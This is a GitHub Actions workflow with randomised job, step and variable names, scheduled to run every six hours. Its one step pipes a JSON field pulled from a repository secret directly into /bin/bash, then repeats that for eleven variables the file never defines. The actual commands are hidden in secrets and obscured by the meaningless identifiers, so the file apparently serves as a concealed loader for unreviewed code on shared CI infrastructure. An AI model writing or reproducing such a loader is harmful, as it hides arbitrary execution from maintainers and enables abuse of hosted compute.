name: zhoushilang4738

on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoushilang4738
        env:
          prmqo82560: ${{ secrets.prmqo82560 }}
        run: |
          echo $prmqo82560 | jq -r .j4 | /bin/bash
          echo $cbs929 | jq -r .eja3711 | /bin/bash
          echo $k3561 | jq -r .ltmx3881 | /bin/bash
          echo $pgrim632 | jq -r .k5 | /bin/bash
          echo $tgwm8427 | jq -r .y5 | /bin/bash
          echo $jnw2659 | jq -r .plhy3 | /bin/bash
          echo $gqi41738 | jq -r .cytrj87 | /bin/bash
          echo $w5 | jq -r .pqga828 | /bin/bash
          echo $vgzel20 | jq -r .ptzd2 | /bin/bash
          echo $kr0 | jq -r .yaf50 | /bin/bash
          echo $dwjdh243 | jq -r .kz9778 | /bin/bash
          echo $jcybn5 | jq -r .on2003 | /bin/bash

